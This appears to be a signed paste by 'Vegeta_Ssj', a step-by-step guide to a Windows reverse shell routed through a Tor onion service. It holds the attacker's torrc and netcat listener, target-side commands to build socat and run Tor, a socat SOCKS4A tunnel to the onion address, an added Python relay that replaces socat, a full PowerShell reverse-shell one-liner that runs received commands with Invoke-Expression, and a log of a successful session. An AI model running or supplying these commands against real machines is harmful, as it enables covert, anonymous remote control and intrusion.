Vegeta_Ssj

Windows Socat Hidden Service Shell

Jun 28th, 2020
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

 ___________________________________
/ Vegeta_Ssj : Windows Socat Hidden \
\ Service Reverse Shell             /
 -----------------------------------
        \   ^__^
         \  (oo)\_______
            (__)\       )\/\
                ||----w |
                ||     ||

email: vegeta_ssj@riseup.net
jid: vegeta@exploit.im / vegeta_ssj@4cjw6cwpeaeppfqz.onion

Attacker (Linux):

Run Tor Hidden Service:

exploit@cockbox:~# sudo cat /etc/tor/torrc

HiddenServiceDir /home/exploit/hidden_shell
HiddenServicePort 8888 127.0.0.1:8888

The HiddenServiceDir must be owned by the user tor runs as and must not be group- or world-accessible (mode 0700), or tor refuses to bring the service up. HiddenServicePort maps port 8888 of the onion service to the netcat listener on 127.0.0.1:8888, so nothing else on the box has to be reachable.

exploit@cockbox:~# tor

Jun 27 17:14:46.000 [notice] Bootstrapped 90%: Establishing a Tor circuit
Jun 27 17:14:47.000 [notice] Bootstrapped 100%: Done

The hostname file holds the address the target will connect to (a 56-character v3 onion address):

exploit@cockbox:~# cat /home/exploit/hidden_shell/hostname
63uxwd4p56vswvyj4gcwvxzkkxzwwtz4lr2yc6w2nwkeniefmhli7xid.onion

Run Netcat listener:

exploit@cockbox:~# nc -lvp 8888 127.0.0.1
listening on [any] 8888 ...

Note the "[any]": this (traditional) netcat has bound every interface, and the trailing 127.0.0.1 only restricts which remote address may connect, it does not change the bind address. To keep the listener reachable solely through the onion service, bind it to loopback: nc -lvp 8888 -s 127.0.0.1 (traditional netcat) or nc -lv 127.0.0.1 8888 (OpenBSD netcat).

Target:

Download Cygwin and install with additional packages:

https://www.cygwin.com/setup-x86_64.exe

- gcc-g++
- gcc-core
- cygwin32-gcc-g++
- cygwin32-gcc-core
- make

Download the Socat source tarball (this paste uses 1.7.3.2; check dest-unreach.org for the latest release):

$url = "http://www.dest-unreach.org/socat/download/socat-1.7.3.2.tar.gz";$output = "$pwd\socat-1.7.3.2.tar.gz"
Invoke-WebRequest -Uri $url -OutFile $output

Save the file under its real name and leave it for tar in the next step: Expand-Archive only handles .zip archives and fails on a .tar.gz. The download is plain HTTP, so compare the tarball against the checksum or PGP signature published next to it before compiling.

Open Cygwin, change to the directory the tarball was saved in (a Windows path such as C:\Users\IEUser is /cygdrive/c/Users/IEUser in Cygwin) and compile Socat under Windows:

tar zxvf socat-1.7.3.2.tar.gz
cd socat-1.7.3.2
./configure
make
make install

make install places socat.exe in /usr/local/bin, which is on the Cygwin shell's PATH.

Download and run Tor from the Windows Expert Bundle:

$url = "https://www.torproject.org/dist/torbrowser/9.5/tor-win32-0.4.3.5.zip";$output = "$pwd\tor.zip"
Invoke-WebRequest -Uri $url -OutFile $output;Expand-Archive -LiteralPath $output
.\tor\Tor\tor.exe

Expand-Archive unpacks the bundle into a tor folder next to the zip (use -DestinationPath to put it elsewhere); tor.exe sits in its Tor\ subfolder. Started without a torrc, tor.exe opens its SOCKS port on 127.0.0.1:9050, the socksport the socat command below expects. Wait for "Bootstrapped 100%: Done" before continuing. The zip is signed by the Tor Project; verify that signature before running the binary.

Run the Socat tunnel from the Hidden Service to the listening port on localhost (from the Cygwin shell, where the freshly built socat is on PATH):

socat.exe TCP4-LISTEN:5555,bind=127.0.0.1,reuseaddr,fork SOCKS4A:127.0.0.1:63uxwd4p56vswvyj4gcwvxzkkxzwwtz4lr2yc6w2nwkeniefmhli7xid.onion:8888,socksport=9050

Every connection to 127.0.0.1:5555 is forked off and handed to tor.exe's SOCKS port as a SOCKS4A CONNECT for the onion hostname and port 8888. SOCKS4A carries the hostname unresolved, so the target never issues a DNS query for the .onion name. bind=127.0.0.1 keeps the tunnel entrance reachable from local processes only; without it TCP4-LISTEN:5555 listens on every interface and anyone on the network could drive the tunnel into the attacker's listener.

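
What that socat line does on the wire, as an added example that is not part of the original paste: a small Python relay that listens on 127.0.0.1:5555, performs the SOCKS4A CONNECT handshake with tor.exe on 127.0.0.1:9050 for the onion hostname, and then copies bytes in both directions, one thread per client in place of socat's fork. It also sanity-checks the onion hostname's format before use. The addresses, ports and the onion hostname are the ones from this paste; the function names and the threading layout are the example's own, and the tor SOCKS port is assumed to be the default 9050.

```python
"""Added example, not from the original paste: the SOCKS4A relay that the socat
command performs, written out so the handshake with tor.exe is visible.
Assumes tor.exe's SocksPort is 127.0.0.1:9050 and the tunnel entrance is
127.0.0.1:5555, as in the paste."""
import base64
import re
import socket
import struct
import sys
import threading

SOCKS_ADDR = ("127.0.0.1", 9050)   # tor.exe's default SocksPort
LOCAL_BIND = ("127.0.0.1", 5555)   # loopback only, like socat's bind=127.0.0.1

# Onion address from the paste, used as the default argument.
PASTE_ONION = "63uxwd4p56vswvyj4gcwvxzkkxzwwtz4lr2yc6w2nwkeniefmhli7xid.onion"

_V3_ONION = re.compile(r"^[a-z2-7]{56}\.onion$")


def is_v3_onion(name: str) -> bool:
    """Format check for a v3 onion hostname: 56 base32 characters decoding to
    pubkey(32) | checksum(2) | version(1) with version == 3. The checksum is
    not recomputed here; tor itself rejects an address with a bad one."""
    if not _V3_ONION.match(name):
        return False
    raw = base64.b32decode(name[:56], casefold=True)
    return raw[34] == 3


def build_socks4a_request(hostname: str, port: int, userid: bytes = b"") -> bytes:
    """SOCKS4A CONNECT: VN=4, CD=1, DSTPORT, DSTIP=0.0.0.1 (meaning 'hostname
    follows'), NUL-terminated USERID, then the NUL-terminated hostname.
    The proxy (tor) resolves the name, so no DNS query leaves the client."""
    host = hostname.encode("ascii")
    if not 0 < port < 65536 or b"\x00" in host or b"\x00" in userid:
        raise ValueError("bad hostname, userid or port")
    return struct.pack("!BBH4s", 4, 1, port, b"\x00\x00\x00\x01") + userid + b"\x00" + host + b"\x00"


def parse_socks4a_reply(reply: bytes) -> int:
    """The reply is 8 bytes: VN=0, CD, DSTPORT, DSTIP. Returns CD
    (90 = request granted, 91..93 = rejected)."""
    if len(reply) != 8 or reply[0] != 0:
        raise ValueError("malformed SOCKS4 reply")
    return reply[1]


def _recv_exact(sock: socket.socket, n: int) -> bytes:
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("SOCKS server closed the connection")
        buf += chunk
    return buf


def socks4a_connect(hostname: str, port: int, socks_addr=SOCKS_ADDR) -> socket.socket:
    """Open a TCP connection to hostname:port through the SOCKS4A proxy (tor)."""
    proxy = socket.create_connection(socks_addr)
    try:
        proxy.sendall(build_socks4a_request(hostname, port))
        code = parse_socks4a_reply(_recv_exact(proxy, 8))
        if code != 90:
            raise ConnectionError(f"SOCKS4A CONNECT to {hostname}:{port} refused (CD={code})")
    except Exception:
        proxy.close()
        raise
    return proxy


def _pump(src: socket.socket, dst: socket.socket) -> None:
    """Copy src -> dst until EOF or error, then shut both sockets down so the
    pump running in the other direction ends too."""
    try:
        while True:
            data = src.recv(4096)
            if not data:
                break
            dst.sendall(data)
    except OSError:
        pass
    finally:
        for s in (src, dst):
            try:
                s.shutdown(socket.SHUT_RDWR)
            except OSError:
                pass


def _handle(client: socket.socket, onion: str, port: int) -> None:
    try:
        upstream = socks4a_connect(onion, port)
    except (OSError, ValueError):
        client.close()
        return
    threading.Thread(target=_pump, args=(client, upstream), daemon=True).start()
    _pump(upstream, client)
    client.close()
    upstream.close()


def serve(onion: str, port: int, bind=LOCAL_BIND) -> None:
    """Equivalent of socat TCP4-LISTEN:5555,bind=127.0.0.1,reuseaddr,fork
    SOCKS4A:127.0.0.1:<onion>:<port>,socksport=9050, with a thread per client."""
    if not is_v3_onion(onion):
        raise ValueError(f"{onion!r} is not a v3 onion hostname")
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind(bind)
        srv.listen(5)
        while True:
            client, _ = srv.accept()
            threading.Thread(target=_handle, args=(client, onion, port), daemon=True).start()


if __name__ == "__main__":
    onion_arg = sys.argv[1] if len(sys.argv) > 1 else PASTE_ONION
    port_arg = int(sys.argv[2]) if len(sys.argv) > 2 else 8888
    serve(onion_arg, port_arg)
```

Run it as python socks4a_relay.py <onion hostname> 8888 with tor.exe already bootstrapped, then point the reverse-shell one-liner at 127.0.0.1:5555 exactly as with socat. Where a Python interpreter is present on the target it can stand in for the Cygwin build of socat; the rejected-CONNECT case (CD other than 90, for example while tor is still bootstrapping) closes the client instead of leaving it hanging.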
Send Powershell reverse shell to Socat listener on localhost:

$client = New-Object System.Net.Sockets.TCPClient('127.0.0.1',5555);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

The one-liner connects to the local tunnel entrance, reads each command the attacker types into netcat as it arrives through the onion service, runs it with Invoke-Expression, and writes the output back followed by a PS prompt. Only loopback traffic to tor.exe leaves the shell process; the target's outbound connections go to Tor relays, never to the attacker's host.

Enjoy:

exploit@cockbox:~# nc -lvp 8888 127.0.0.1
listening on [any] 8888 ...
connect to [127.0.0.1] from localhost [127.0.0.1] 59496

PS C:\Users\IEUser> whoami
msedgewin10\ieuser

The connection arrives from 127.0.0.1 because the attacker's own tor daemon delivers the onion-service circuit to the listener; the target's address is not visible here, just as the attacker's is not visible on the target.

Enjoy :)
-----BEGIN PGP SIGNATURE-----

iQETBAEBCgB9FiEEdkePr+T8OnYM3UyACVTIwtMKCJYFAl8KQWdfFIAAAAAALgAo
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDc2
NDc4RkFGRTRGQzNBNzYwQ0RENEM4MDA5NTRDOEMyRDMwQTA4OTYACgkQCVTIwtMK
CJbJlgQAh/6cS4lB3Jz1d2yxPwm334W990C4cmov9v+thlg/2Z9WYY8ecYRfD2GA
WPf/4oSfxcILrE2WnXeZctqPWtqVUAMsRRiWW1heFYZ/gnTU6wEAQelpoNXQRtxc
x+iPmTbkSc3K4/P4PwSTAwhorD89YaGoRKSotNmAaSeWBEFhUiA=
=8W4Z
-----END PGP SIGNATURE-----